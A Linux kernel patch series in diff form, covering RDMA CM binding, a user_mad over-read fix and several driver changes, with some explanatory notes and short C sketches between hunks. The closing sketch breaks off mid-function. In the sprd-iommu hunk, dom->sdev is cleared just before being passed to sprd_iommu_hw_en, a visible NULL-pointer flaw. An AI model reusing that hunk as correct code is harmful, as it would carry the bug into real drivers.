+@@ -4064,27 +3949,26 @@ int rdma_listen(struct rdma_cm_id *id, int backlog)
+ }
+ EXPORT_SYMBOL(rdma_listen);
+ 
+-int rdma_bind_addr(struct rdma_cm_id *id, struct sockaddr *addr)
++static int rdma_bind_addr_dst(struct rdma_id_private *id_priv,
++			      struct sockaddr *addr, const struct sockaddr *daddr)
+ {
+-	struct rdma_id_private *id_priv;
++	struct sockaddr *id_daddr;
+ 	int ret;
+-	struct sockaddr  *daddr;
+ 
+ 	if (addr->sa_family != AF_INET && addr->sa_family != AF_INET6 &&
+ 	    addr->sa_family != AF_IB)
+ 		return -EAFNOSUPPORT;
+ 
+-	id_priv = container_of(id, struct rdma_id_private, id);
+ 	if (!cma_comp_exch(id_priv, RDMA_CM_IDLE, RDMA_CM_ADDR_BOUND))
+ 		return -EINVAL;
+ 
+-	ret = cma_check_linklocal(&id->route.addr.dev_addr, addr);
++	ret = cma_check_linklocal(&id_priv->id.route.addr.dev_addr, addr);
+ 	if (ret)
+ 		goto err1;
+ 
+ 	memcpy(cma_src_addr(id_priv), addr, rdma_addr_size(addr));
+ 	if (!cma_any_addr(addr)) {
+-		ret = cma_translate_addr(addr, &id->route.addr.dev_addr);
++		ret = cma_translate_addr(addr, &id_priv->id.route.addr.dev_addr);
+ 		if (ret)
+ 			goto err1;
+ 
+@@ -4104,8 +3988,10 @@ int rdma_bind_addr(struct rdma_cm_id *id, struct sockaddr *addr)
+ 		}
+ #endif
+ 	}
+-	daddr = cma_dst_addr(id_priv);
+-	daddr->sa_family = addr->sa_family;
++	id_daddr = cma_dst_addr(id_priv);
++	if (daddr != id_daddr)
++		memcpy(id_daddr, daddr, rdma_addr_size(addr));
++	id_daddr->sa_family = addr->sa_family;
+ 
+ 	ret = cma_get_port(id_priv);
+ 	if (ret)
+@@ -4121,6 +4007,129 @@ int rdma_bind_addr(struct rdma_cm_id *id, struct sockaddr *addr)
+ 	cma_comp_exch(id_priv, RDMA_CM_ADDR_BOUND, RDMA_CM_IDLE);
+ 	return ret;
+ }
++
++static int cma_bind_addr(struct rdma_cm_id *id, struct sockaddr *src_addr,
++			 const struct sockaddr *dst_addr)
++{
++	struct rdma_id_private *id_priv =
++		container_of(id, struct rdma_id_private, id);
++	struct sockaddr_storage zero_sock = {};
++
++	if (src_addr && src_addr->sa_family)
++		return rdma_bind_addr_dst(id_priv, src_addr, dst_addr);
++
++	/*
++	 * When the src_addr is not specified, automatically supply an any addr
++	 */
++	zero_sock.ss_family = dst_addr->sa_family;
++	if (IS_ENABLED(CONFIG_IPV6) && dst_addr->sa_family == AF_INET6) {
++		struct sockaddr_in6 *src_addr6 =
++			(struct sockaddr_in6 *)&zero_sock;
++		struct sockaddr_in6 *dst_addr6 =
++			(struct sockaddr_in6 *)dst_addr;
++
++		src_addr6->sin6_scope_id = dst_addr6->sin6_scope_id;
++		if (ipv6_addr_type(&dst_addr6->sin6_addr) & IPV6_ADDR_LINKLOCAL)
++			id->route.addr.dev_addr.bound_dev_if =
++				dst_addr6->sin6_scope_id;
++	} else if (dst_addr->sa_family == AF_IB) {
++		((struct sockaddr_ib *)&zero_sock)->sib_pkey =
++			((struct sockaddr_ib *)dst_addr)->sib_pkey;
++	}
++	return rdma_bind_addr_dst(id_priv, (struct sockaddr *)&zero_sock, dst_addr);
++}
++
++/*
++ * If required, resolve the source address for bind and leave the id_priv in
++ * state RDMA_CM_ADDR_BOUND. This oddly uses the state to determine the prior
++ * calls made by ULP, a previously bound ID will not be re-bound and src_addr is
++ * ignored.
++ */
++static int resolve_prepare_src(struct rdma_id_private *id_priv,
++			       struct sockaddr *src_addr,
++			       const struct sockaddr *dst_addr)
++{
++	int ret;
++
++	if (!cma_comp_exch(id_priv, RDMA_CM_ADDR_BOUND, RDMA_CM_ADDR_QUERY)) {
++		/* For a well behaved ULP state will be RDMA_CM_IDLE */
++		ret = cma_bind_addr(&id_priv->id, src_addr, dst_addr);
++		if (ret)
++			return ret;
++		if (WARN_ON(!cma_comp_exch(id_priv, RDMA_CM_ADDR_BOUND,
++					   RDMA_CM_ADDR_QUERY)))
++			return -EINVAL;
++
++	} else {
++		memcpy(cma_dst_addr(id_priv), dst_addr, rdma_addr_size(dst_addr));
++	}
++
++	if (cma_family(id_priv) != dst_addr->sa_family) {
++		ret = -EINVAL;
++		goto err_state;
++	}
++	return 0;
++
++err_state:
++	cma_comp_exch(id_priv, RDMA_CM_ADDR_QUERY, RDMA_CM_ADDR_BOUND);
++	return ret;
++}
++
++int rdma_resolve_addr(struct rdma_cm_id *id, struct sockaddr *src_addr,
++		      const struct sockaddr *dst_addr, unsigned long timeout_ms)
++{
++	struct rdma_id_private *id_priv =
++		container_of(id, struct rdma_id_private, id);
++	int ret;
++
++	ret = resolve_prepare_src(id_priv, src_addr, dst_addr);
++	if (ret)
++		return ret;
++
++	if (cma_any_addr(dst_addr)) {
++		ret = cma_resolve_loopback(id_priv);
++	} else {
++		if (dst_addr->sa_family == AF_IB) {
++			ret = cma_resolve_ib_addr(id_priv);
++		} else {
++			/*
++			 * The FSM can return back to RDMA_CM_ADDR_BOUND after
++			 * rdma_resolve_ip() is called, eg through the error
++			 * path in addr_handler(). If this happens the existing
++			 * request must be canceled before issuing a new one.
++			 * Since canceling a request is a bit slow and this
++			 * oddball path is rare, keep track once a request has
++			 * been issued. The track turns out to be a permanent
++			 * state since this is the only cancel as it is
++			 * immediately before rdma_resolve_ip().
++			 */
++			if (id_priv->used_resolve_ip)
++				rdma_addr_cancel(&id->route.addr.dev_addr);
++			else
++				id_priv->used_resolve_ip = 1;
++			ret = rdma_resolve_ip(cma_src_addr(id_priv), dst_addr,
++					      &id->route.addr.dev_addr,
++					      timeout_ms, addr_handler,
++					      false, id_priv);
++		}
++	}
++	if (ret)
++		goto err;
++
++	return 0;
++err:
++	cma_comp_exch(id_priv, RDMA_CM_ADDR_QUERY, RDMA_CM_ADDR_BOUND);
++	return ret;
++}
++EXPORT_SYMBOL(rdma_resolve_addr);
++
++int rdma_bind_addr(struct rdma_cm_id *id, struct sockaddr *addr)
++{
++	struct rdma_id_private *id_priv =
++		container_of(id, struct rdma_id_private, id);
++
++	return rdma_bind_addr_dst(id_priv, addr, cma_dst_addr(id_priv));
++}
+ EXPORT_SYMBOL(rdma_bind_addr);
+ 
+ static int cma_format_hdr(void *hdr, struct rdma_id_private *id_priv)
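The refactor above hinges on the CM ID's state machine: rdma_bind_addr_dst() may only run in RDMA_CM_IDLE, and resolve_prepare_src() now copies the destination address only after winning the ADDR_BOUND -> ADDR_QUERY transition, so a racing caller can no longer clobber cma_dst_addr() of an already-bound ID. A minimal userspace sketch of that guard, using C11 atomics where the kernel uses a spinlock, with purely illustrative names:

    #include <stdatomic.h>
    #include <stdbool.h>

    enum cm_state { CM_IDLE, CM_ADDR_BOUND, CM_ADDR_QUERY };

    struct cm_id { _Atomic enum cm_state state; };

    /* Move @id from @from to @to only if nothing changed it meanwhile. */
    static bool cm_comp_exch(struct cm_id *id, enum cm_state from,
                             enum cm_state to)
    {
            return atomic_compare_exchange_strong(&id->state, &from, to);
    }

    /* Only the winner of the IDLE -> ADDR_BOUND race may touch addresses. */
    static bool cm_try_bind(struct cm_id *id)
    {
            return cm_comp_exch(id, CM_IDLE, CM_ADDR_BOUND);
    }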
+diff --git a/drivers/infiniband/core/cma_trace.h b/drivers/infiniband/core/cma_trace.h
+index e45264267bcc9..47f3c6e4be893 100644
+--- a/drivers/infiniband/core/cma_trace.h
++++ b/drivers/infiniband/core/cma_trace.h
+@@ -15,7 +15,7 @@
+ #define _TRACE_RDMA_CMA_H
+ 
+ #include <linux/tracepoint.h>
+-#include <trace/events/rdma.h>
++#include <trace/misc/rdma.h>
+ 
+ 
+ DECLARE_EVENT_CLASS(cma_fsm_class,
+diff --git a/drivers/infiniband/core/user_mad.c b/drivers/infiniband/core/user_mad.c
+index d96c78e436f98..5c284dfbe6923 100644
+--- a/drivers/infiniband/core/user_mad.c
++++ b/drivers/infiniband/core/user_mad.c
+@@ -131,6 +131,11 @@ struct ib_umad_packet {
+ 	struct ib_user_mad mad;
+ };
+ 
++struct ib_rmpp_mad_hdr {
++	struct ib_mad_hdr	mad_hdr;
++	struct ib_rmpp_hdr      rmpp_hdr;
++} __packed;
++
+ #define CREATE_TRACE_POINTS
+ #include <trace/events/ib_umad.h>
+ 
+@@ -494,11 +499,11 @@ static ssize_t ib_umad_write(struct file *filp, const char __user *buf,
+ 			     size_t count, loff_t *pos)
+ {
+ 	struct ib_umad_file *file = filp->private_data;
++	struct ib_rmpp_mad_hdr *rmpp_mad_hdr;
+ 	struct ib_umad_packet *packet;
+ 	struct ib_mad_agent *agent;
+ 	struct rdma_ah_attr ah_attr;
+ 	struct ib_ah *ah;
+-	struct ib_rmpp_mad *rmpp_mad;
+ 	__be64 *tid;
+ 	int ret, data_len, hdr_len, copy_offset, rmpp_active;
+ 	u8 base_version;
+@@ -506,7 +511,7 @@ static ssize_t ib_umad_write(struct file *filp, const char __user *buf,
+ 	if (count < hdr_size(file) + IB_MGMT_RMPP_HDR)
+ 		return -EINVAL;
+ 
+-	packet = kzalloc(sizeof *packet + IB_MGMT_RMPP_HDR, GFP_KERNEL);
++	packet = kzalloc(sizeof(*packet) + IB_MGMT_RMPP_HDR, GFP_KERNEL);
+ 	if (!packet)
+ 		return -ENOMEM;
+ 
+@@ -560,13 +565,13 @@ static ssize_t ib_umad_write(struct file *filp, const char __user *buf,
+ 		goto err_up;
+ 	}
+ 
+-	rmpp_mad = (struct ib_rmpp_mad *) packet->mad.data;
+-	hdr_len = ib_get_mad_data_offset(rmpp_mad->mad_hdr.mgmt_class);
++	rmpp_mad_hdr = (struct ib_rmpp_mad_hdr *)packet->mad.data;
++	hdr_len = ib_get_mad_data_offset(rmpp_mad_hdr->mad_hdr.mgmt_class);
+ 
+-	if (ib_is_mad_class_rmpp(rmpp_mad->mad_hdr.mgmt_class)
++	if (ib_is_mad_class_rmpp(rmpp_mad_hdr->mad_hdr.mgmt_class)
+ 	    && ib_mad_kernel_rmpp_agent(agent)) {
+ 		copy_offset = IB_MGMT_RMPP_HDR;
+-		rmpp_active = ib_get_rmpp_flags(&rmpp_mad->rmpp_hdr) &
++		rmpp_active = ib_get_rmpp_flags(&rmpp_mad_hdr->rmpp_hdr) &
+ 						IB_MGMT_RMPP_FLAG_ACTIVE;
+ 	} else {
+ 		copy_offset = IB_MGMT_MAD_HDR;
+@@ -615,12 +620,12 @@ static ssize_t ib_umad_write(struct file *filp, const char __user *buf,
+ 		tid = &((struct ib_mad_hdr *) packet->msg->mad)->tid;
+ 		*tid = cpu_to_be64(((u64) agent->hi_tid) << 32 |
+ 				   (be64_to_cpup(tid) & 0xffffffff));
+-		rmpp_mad->mad_hdr.tid = *tid;
++		rmpp_mad_hdr->mad_hdr.tid = *tid;
+ 	}
+ 
+ 	if (!ib_mad_kernel_rmpp_agent(agent)
+-	   && ib_is_mad_class_rmpp(rmpp_mad->mad_hdr.mgmt_class)
+-	   && (ib_get_rmpp_flags(&rmpp_mad->rmpp_hdr) & IB_MGMT_RMPP_FLAG_ACTIVE)) {
++	    && ib_is_mad_class_rmpp(rmpp_mad_hdr->mad_hdr.mgmt_class)
++	    && (ib_get_rmpp_flags(&rmpp_mad_hdr->rmpp_hdr) & IB_MGMT_RMPP_FLAG_ACTIVE)) {
+ 		spin_lock_irq(&file->send_lock);
+ 		list_add_tail(&packet->list, &file->send_list);
+ 		spin_unlock_irq(&file->send_lock);
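The kzalloc() above reserves only IB_MGMT_RMPP_HDR bytes past the packet header, so casting packet->mad.data to a full struct ib_rmpp_mad invited reads beyond the allocation; the trimmed __packed struct covers exactly the bytes the function touches. The same defensive pattern, reduced to a runnable sketch with illustrative struct names:

    #include <stddef.h>
    #include <stdint.h>
    #include <string.h>

    /* Covers only the guaranteed prefix of the message, nothing more. */
    struct msg_hdr {
            uint8_t  mgmt_class;
            uint8_t  class_version;
            uint16_t flags;
    } __attribute__((packed));

    static int peek_mgmt_class(const void *buf, size_t len, uint8_t *out)
    {
            struct msg_hdr hdr;

            if (len < sizeof(hdr))
                    return -1;              /* short message: reject */
            memcpy(&hdr, buf, sizeof(hdr)); /* never reads past the prefix */
            *out = hdr.mgmt_class;
            return 0;
    }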
+diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
+index 02f3bc4e4895e..13c36f51b9353 100644
+--- a/drivers/input/joystick/xpad.c
++++ b/drivers/input/joystick/xpad.c
+@@ -564,6 +564,9 @@ struct xboxone_init_packet {
+ #define GIP_MOTOR_LT BIT(3)
+ #define GIP_MOTOR_ALL (GIP_MOTOR_R | GIP_MOTOR_L | GIP_MOTOR_RT | GIP_MOTOR_LT)
+ 
++#define GIP_WIRED_INTF_DATA 0
++#define GIP_WIRED_INTF_AUDIO 1
++
+ /*
+  * This packet is required for all Xbox One pads with 2015
+  * or later firmware installed (or present from the factory).
+@@ -2008,7 +2011,7 @@ static int xpad_probe(struct usb_interface *intf, const struct usb_device_id *id
+ 	}
+ 
+ 	if (xpad->xtype == XTYPE_XBOXONE &&
+-	    intf->cur_altsetting->desc.bInterfaceNumber != 0) {
++	    intf->cur_altsetting->desc.bInterfaceNumber != GIP_WIRED_INTF_DATA) {
+ 		/*
+ 		 * The Xbox One controller lists three interfaces all with the
+ 		 * same interface class, subclass and protocol. Differentiate by
+diff --git a/drivers/interconnect/core.c b/drivers/interconnect/core.c
+index 1d9494f64a215..4526ff2e1bd5f 100644
+--- a/drivers/interconnect/core.c
++++ b/drivers/interconnect/core.c
+@@ -29,7 +29,6 @@ static LIST_HEAD(icc_providers);
+ static int providers_count;
+ static bool synced_state;
+ static DEFINE_MUTEX(icc_lock);
+-static DEFINE_MUTEX(icc_bw_lock);
+ static struct dentry *icc_debugfs_dir;
+ 
+ static void icc_summary_show_one(struct seq_file *s, struct icc_node *n)
+@@ -636,7 +635,7 @@ int icc_set_bw(struct icc_path *path, u32 avg_bw, u32 peak_bw)
+ 	if (WARN_ON(IS_ERR(path) || !path->num_nodes))
+ 		return -EINVAL;
+ 
+-	mutex_lock(&icc_bw_lock);
++	mutex_lock(&icc_lock);
+ 
+ 	old_avg = path->reqs[0].avg_bw;
+ 	old_peak = path->reqs[0].peak_bw;
+@@ -668,7 +667,7 @@ int icc_set_bw(struct icc_path *path, u32 avg_bw, u32 peak_bw)
+ 		apply_constraints(path);
+ 	}
+ 
+-	mutex_unlock(&icc_bw_lock);
++	mutex_unlock(&icc_lock);
+ 
+ 	trace_icc_set_bw_end(path, ret);
+ 
+@@ -971,7 +970,6 @@ void icc_node_add(struct icc_node *node, struct icc_provider *provider)
+ 		return;
+ 
+ 	mutex_lock(&icc_lock);
+-	mutex_lock(&icc_bw_lock);
+ 
+ 	node->provider = provider;
+ 	list_add_tail(&node->node_list, &provider->nodes);
+@@ -997,7 +995,6 @@ void icc_node_add(struct icc_node *node, struct icc_provider *provider)
+ 	node->avg_bw = 0;
+ 	node->peak_bw = 0;
+ 
+-	mutex_unlock(&icc_bw_lock);
+ 	mutex_unlock(&icc_lock);
+ }
+ EXPORT_SYMBOL_GPL(icc_node_add);
+@@ -1137,7 +1134,6 @@ void icc_sync_state(struct device *dev)
+ 		return;
+ 
+ 	mutex_lock(&icc_lock);
+-	mutex_lock(&icc_bw_lock);
+ 	synced_state = true;
+ 	list_for_each_entry(p, &icc_providers, provider_list) {
+ 		dev_dbg(p->dev, "interconnect provider is in synced state\n");
+@@ -1150,21 +1146,13 @@ void icc_sync_state(struct device *dev)
+ 			}
+ 		}
+ 	}
+-	mutex_unlock(&icc_bw_lock);
+ 	mutex_unlock(&icc_lock);
+ }
+ EXPORT_SYMBOL_GPL(icc_sync_state);
+ 
+ static int __init icc_init(void)
+ {
+-	struct device_node *root;
+-
+-	/* Teach lockdep about lock ordering wrt. shrinker: */
+-	fs_reclaim_acquire(GFP_KERNEL);
+-	might_lock(&icc_bw_lock);
+-	fs_reclaim_release(GFP_KERNEL);
+-
+-	root = of_find_node_by_path("/");
++	struct device_node *root = of_find_node_by_path("/");
+ 
+ 	providers_count = of_count_icc_providers(root);
+ 	of_node_put(root);
+diff --git a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+index 8966f7d5aab61..82f100e591b5a 100644
+--- a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
++++ b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+@@ -152,6 +152,18 @@ static void queue_inc_cons(struct arm_smmu_ll_queue *q)
+ 	q->cons = Q_OVF(q->cons) | Q_WRP(q, cons) | Q_IDX(q, cons);
+ }
+ 
++static void queue_sync_cons_ovf(struct arm_smmu_queue *q)
++{
++	struct arm_smmu_ll_queue *llq = &q->llq;
++
++	if (likely(Q_OVF(llq->prod) == Q_OVF(llq->cons)))
++		return;
++
++	llq->cons = Q_OVF(llq->prod) | Q_WRP(llq, llq->cons) |
++		      Q_IDX(llq, llq->cons);
++	queue_sync_cons_out(q);
++}
++
+ static int queue_sync_prod_in(struct arm_smmu_queue *q)
+ {
+ 	u32 prod;
+@@ -1583,8 +1595,7 @@ static irqreturn_t arm_smmu_evtq_thread(int irq, void *dev)
+ 	} while (!queue_empty(llq));
+ 
+ 	/* Sync our overflow flag, as we believe we're up to speed */
+-	llq->cons = Q_OVF(llq->prod) | Q_WRP(llq, llq->cons) |
+-		    Q_IDX(llq, llq->cons);
++	queue_sync_cons_ovf(q);
+ 	return IRQ_HANDLED;
+ }
+ 
+@@ -1642,9 +1653,7 @@ static irqreturn_t arm_smmu_priq_thread(int irq, void *dev)
+ 	} while (!queue_empty(llq));
+ 
+ 	/* Sync our overflow flag, as we believe we're up to speed */
+-	llq->cons = Q_OVF(llq->prod) | Q_WRP(llq, llq->cons) |
+-		      Q_IDX(llq, llq->cons);
+-	queue_sync_cons_out(q);
++	queue_sync_cons_ovf(q);
+ 	return IRQ_HANDLED;
+ }
+ 
+diff --git a/drivers/iommu/arm/arm-smmu/arm-smmu-qcom.c b/drivers/iommu/arm/arm-smmu/arm-smmu-qcom.c
+index d80065c8105af..f15dcb9e4175c 100644
+--- a/drivers/iommu/arm/arm-smmu/arm-smmu-qcom.c
++++ b/drivers/iommu/arm/arm-smmu/arm-smmu-qcom.c
+@@ -267,12 +267,26 @@ static int qcom_smmu_init_context(struct arm_smmu_domain *smmu_domain,
+ 
+ static int qcom_smmu_cfg_probe(struct arm_smmu_device *smmu)
+ {
+-	unsigned int last_s2cr = ARM_SMMU_GR0_S2CR(smmu->num_mapping_groups - 1);
+ 	struct qcom_smmu *qsmmu = to_qcom_smmu(smmu);
++	unsigned int last_s2cr;
+ 	u32 reg;
+ 	u32 smr;
+ 	int i;
+ 
++	/*
++	 * Some platforms support more than the Arm SMMU architected maximum of
++	 * 128 stream matching groups. For unknown reasons, the additional
++	 * groups don't exhibit the same behavior as the architected registers,
++	 * so limit the groups to 128 until the behavior is fixed for the other
++	 * groups.
++	 */
++	if (smmu->num_mapping_groups > 128) {
++		dev_notice(smmu->dev, "\tLimiting the stream matching groups to 128\n");
++		smmu->num_mapping_groups = 128;
++	}
++
++	last_s2cr = ARM_SMMU_GR0_S2CR(smmu->num_mapping_groups - 1);
++
+ 	/*
+ 	 * With some firmware versions writes to S2CR of type FAULT are
+ 	 * ignored, and writing BYPASS will end up written as FAULT in the
+diff --git a/drivers/iommu/sprd-iommu.c b/drivers/iommu/sprd-iommu.c
+index 8261066de07d7..e4358393fe378 100644
+--- a/drivers/iommu/sprd-iommu.c
++++ b/drivers/iommu/sprd-iommu.c
+@@ -152,13 +152,6 @@ static struct iommu_domain *sprd_iommu_domain_alloc(unsigned int domain_type)
+ 	return &dom->domain;
+ }
+ 
+-static void sprd_iommu_domain_free(struct iommu_domain *domain)
+-{
+-	struct sprd_iommu_domain *dom = to_sprd_domain(domain);
+-
+-	kfree(dom);
+-}
+-
+ static void sprd_iommu_first_vpn(struct sprd_iommu_domain *dom)
+ {
+ 	struct sprd_iommu_device *sdev = dom->sdev;
+@@ -231,6 +224,28 @@ static void sprd_iommu_hw_en(struct sprd_iommu_device *sdev, bool en)
+ 	sprd_iommu_update_bits(sdev, reg_cfg, mask, 0, val);
+ }
+ 
++static void sprd_iommu_cleanup(struct sprd_iommu_domain *dom)
++{
++	size_t pgt_size;
++
++	/* Nothing need to do if the domain hasn't been attached */
++	if (!dom->sdev)
++		return;
++
++	pgt_size = sprd_iommu_pgt_size(&dom->domain);
++	dma_free_coherent(dom->sdev->dev, pgt_size, dom->pgt_va, dom->pgt_pa);
++	dom->sdev = NULL;
++	sprd_iommu_hw_en(dom->sdev, false);
++}
++
++static void sprd_iommu_domain_free(struct iommu_domain *domain)
++{
++	struct sprd_iommu_domain *dom = to_sprd_domain(domain);
++
++	sprd_iommu_cleanup(dom);
++	kfree(dom);
++}
++
+ static int sprd_iommu_attach_device(struct iommu_domain *domain,
+ 				    struct device *dev)
+ {
+diff --git a/drivers/mmc/core/mmc.c b/drivers/mmc/core/mmc.c
+index a46ce0868fe1f..3a927452a6501 100644
+--- a/drivers/mmc/core/mmc.c
++++ b/drivers/mmc/core/mmc.c
+@@ -1007,10 +1007,12 @@ static int mmc_select_bus_width(struct mmc_card *card)
+ 	static unsigned ext_csd_bits[] = {
+ 		EXT_CSD_BUS_WIDTH_8,
+ 		EXT_CSD_BUS_WIDTH_4,
++		EXT_CSD_BUS_WIDTH_1,
+ 	};
+ 	static unsigned bus_widths[] = {
+ 		MMC_BUS_WIDTH_8,
+ 		MMC_BUS_WIDTH_4,
++		MMC_BUS_WIDTH_1,
+ 	};
+ 	struct mmc_host *host = card->host;
+ 	unsigned idx, bus_width = 0;
+diff --git a/drivers/mmc/host/mmci_stm32_sdmmc.c b/drivers/mmc/host/mmci_stm32_sdmmc.c
+index 60bca78a72b19..0511583ffa764 100644
+--- a/drivers/mmc/host/mmci_stm32_sdmmc.c
++++ b/drivers/mmc/host/mmci_stm32_sdmmc.c
+@@ -200,6 +200,8 @@ static int sdmmc_idma_start(struct mmci_host *host, unsigned int *datactrl)
+ 	struct scatterlist *sg;
+ 	int i;
+ 
++	host->dma_in_progress = true;
++
+ 	if (!host->variant->dma_lli || data->sg_len == 1 ||
+ 	    idma->use_bounce_buffer) {
+ 		u32 dma_addr;
+@@ -238,9 +240,30 @@ static int sdmmc_idma_start(struct mmci_host *host, unsigned int *datactrl)
+ 	return 0;
+ }
+ 
++static void sdmmc_idma_error(struct mmci_host *host)
++{
++	struct mmc_data *data = host->data;
++	struct sdmmc_idma *idma = host->dma_priv;
++
++	if (!dma_inprogress(host))
++		return;
++
++	writel_relaxed(0, host->base + MMCI_STM32_IDMACTRLR);
++	host->dma_in_progress = false;
++	data->host_cookie = 0;
++
++	if (!idma->use_bounce_buffer)
++		dma_unmap_sg(mmc_dev(host->mmc), data->sg, data->sg_len,
++			     mmc_get_dma_dir(data));
++}
++
+ static void sdmmc_idma_finalize(struct mmci_host *host, struct mmc_data *data)
+ {
++	if (!dma_inprogress(host))
++		return;
++
+ 	writel_relaxed(0, host->base + MMCI_STM32_IDMACTRLR);
++	host->dma_in_progress = false;
+ 
+ 	if (!data->host_cookie)
+ 		sdmmc_idma_unprep_data(host, data, 0);
+@@ -567,6 +590,7 @@ static struct mmci_host_ops sdmmc_variant_ops = {
+ 	.dma_setup = sdmmc_idma_setup,
+ 	.dma_start = sdmmc_idma_start,
+ 	.dma_finalize = sdmmc_idma_finalize,
++	.dma_error = sdmmc_idma_error,
+ 	.set_clkreg = mmci_sdmmc_set_clkreg,
+ 	.set_pwrreg = mmci_sdmmc_set_pwrreg,
+ 	.busy_complete = sdmmc_busy_complete,
+diff --git a/drivers/mmc/host/sdhci-xenon-phy.c b/drivers/mmc/host/sdhci-xenon-phy.c
+index 8cf3a375de659..cc9d28b75eb91 100644
+--- a/drivers/mmc/host/sdhci-xenon-phy.c
++++ b/drivers/mmc/host/sdhci-xenon-phy.c
+@@ -11,6 +11,7 @@
+ #include <linux/slab.h>
+ #include <linux/delay.h>
+ #include <linux/ktime.h>
++#include <linux/iopoll.h>
+ #include <linux/of_address.h>
+ 
+ #include "sdhci-pltfm.h"
+@@ -109,6 +110,8 @@
+ #define XENON_EMMC_PHY_LOGIC_TIMING_ADJUST	(XENON_EMMC_PHY_REG_BASE + 0x18)
+ #define XENON_LOGIC_TIMING_VALUE		0x00AA8977
+ 
++#define XENON_MAX_PHY_TIMEOUT_LOOPS		100
++
+ /*
+  * List offset of PHY registers and some special register values
+  * in eMMC PHY 5.0 or eMMC PHY 5.1
+@@ -216,6 +219,19 @@ static int xenon_alloc_emmc_phy(struct sdhci_host *host)
+ 	return 0;
+ }
+ 
++static int xenon_check_stability_internal_clk(struct sdhci_host *host)
++{
++	u32 reg;
++	int err;
++
++	err = read_poll_timeout(sdhci_readw, reg, reg & SDHCI_CLOCK_INT_STABLE,
++				1100, 20000, false, host, SDHCI_CLOCK_CONTROL);
++	if (err)
++		dev_err(mmc_dev(host->mmc), "phy_init: Internal clock never stabilized.\n");
++
++	return err;
++}
++
+ /*
+  * eMMC 5.0/5.1 PHY init/re-init.
+  * eMMC PHY init should be executed after:
+@@ -232,6 +248,11 @@ static int xenon_emmc_phy_init(struct sdhci_host *host)
+ 	struct xenon_priv *priv = sdhci_pltfm_priv(pltfm_host);
+ 	struct xenon_emmc_phy_regs *phy_regs = priv->emmc_phy_regs;
+ 
++	int ret = xenon_check_stability_internal_clk(host);
++
++	if (ret)
++		return ret;
++
+ 	reg = sdhci_readl(host, phy_regs->timing_adj);
+ 	reg |= XENON_PHY_INITIALIZAION;
+ 	sdhci_writel(host, reg, phy_regs->timing_adj);
+@@ -259,18 +280,27 @@ static int xenon_emmc_phy_init(struct sdhci_host *host)
+ 	/* get the wait time */
+ 	wait /= clock;
+ 	wait++;
+-	/* wait for host eMMC PHY init completes */
+-	udelay(wait);
+ 
+-	reg = sdhci_readl(host, phy_regs->timing_adj);
+-	reg &= XENON_PHY_INITIALIZAION;
+-	if (reg) {
++	/*
++	 * AC5X spec says bit must be polled until zero.
++	 * We see cases in which timeout can take longer
++	 * than the standard calculation on AC5X, which is
++	 * expected following the spec comment above.
++	 * According to the spec, we must wait as long as
++	 * it takes for that bit to toggle on AC5X.
++	 * Cap that with 100 delay loops so we won't get
++	 * stuck here forever:
++	 */
++
++	ret = read_poll_timeout(sdhci_readl, reg,
++				!(reg & XENON_PHY_INITIALIZAION),
++				wait, XENON_MAX_PHY_TIMEOUT_LOOPS * wait,
++				false, host, phy_regs->timing_adj);
++	if (ret)
+ 		dev_err(mmc_dev(host->mmc), "eMMC PHY init cannot complete after %d us\n",
+-			wait);
+-		return -ETIMEDOUT;
+-	}
++			wait * XENON_MAX_PHY_TIMEOUT_LOOPS);
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ #define ARMADA_3700_SOC_PAD_1_8V	0x1
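The conversion above replaces a single udelay()-then-test with read_poll_timeout(), which keeps re-reading the register until the condition holds or the deadline passes. A minimal sketch of the same <linux/iopoll.h> helper, against a made-up ready bit:

    #include <linux/bits.h>
    #include <linux/io.h>
    #include <linux/iopoll.h>

    /* Poll a hypothetical ready flag every 10us, give up after 10ms. */
    static int demo_wait_ready(void __iomem *reg)
    {
            u32 val;

            return readl_poll_timeout(reg, val, !(val & BIT(0)),
                                      10 /* sleep_us */,
                                      10000 /* timeout_us */);
    }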
+diff --git a/drivers/mtd/nand/spi/gigadevice.c b/drivers/mtd/nand/spi/gigadevice.c
+index 6b043e24855fb..9116ee7f023ed 100644
+--- a/drivers/mtd/nand/spi/gigadevice.c
++++ b/drivers/mtd/nand/spi/gigadevice.c
+@@ -186,7 +186,7 @@ static int gd5fxgq4uexxg_ecc_get_status(struct spinand_device *spinand,
+ {
+ 	u8 status2;
+ 	struct spi_mem_op op = SPINAND_GET_FEATURE_OP(GD5FXGQXXEXXG_REG_STATUS2,
+-						      &status2);
++						      spinand->scratchbuf);
+ 	int ret;
+ 
+ 	switch (status & STATUS_ECC_MASK) {
+@@ -207,6 +207,7 @@ static int gd5fxgq4uexxg_ecc_get_status(struct spinand_device *spinand,
+ 		 * report the maximum of 4 in this case
+ 		 */
+ 		/* bits sorted this way (3...0): ECCS1,ECCS0,ECCSE1,ECCSE0 */
++		status2 = *(spinand->scratchbuf);
+ 		return ((status & STATUS_ECC_MASK) >> 2) |
+ 			((status2 & STATUS_ECC_MASK) >> 4);
+ 
+@@ -228,7 +229,7 @@ static int gd5fxgq5xexxg_ecc_get_status(struct spinand_device *spinand,
+ {
+ 	u8 status2;
+ 	struct spi_mem_op op = SPINAND_GET_FEATURE_OP(GD5FXGQXXEXXG_REG_STATUS2,
+-						      &status2);
++						      spinand->scratchbuf);
+ 	int ret;
+ 
+ 	switch (status & STATUS_ECC_MASK) {
+@@ -248,6 +249,7 @@ static int gd5fxgq5xexxg_ecc_get_status(struct spinand_device *spinand,
+ 		 * 1 ... 4 bits are flipped (and corrected)
+ 		 */
+ 		/* bits sorted this way (1...0): ECCSE1, ECCSE0 */
++		status2 = *(spinand->scratchbuf);
+ 		return ((status2 & STATUS_ECC_MASK) >> 4) + 1;
+ 
+ 	case STATUS_ECC_UNCOR_ERROR:
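Both hunks above enforce the same rule: a spi-mem data buffer may be handed to DMA, so it must not live on the stack the way the old status2 byte did. Reads go through the device's preallocated scratchbuf, and the byte is copied out afterwards. A sketch of that shape; the helper name is hypothetical, the fields come from struct spinand_device:

    static int demo_read_status2(struct spinand_device *spinand, u8 reg,
                                 u8 *out)
    {
            struct spi_mem_op op = SPINAND_GET_FEATURE_OP(reg,
                                                          spinand->scratchbuf);
            int ret;

            ret = spi_mem_exec_op(spinand->spimem, &op);
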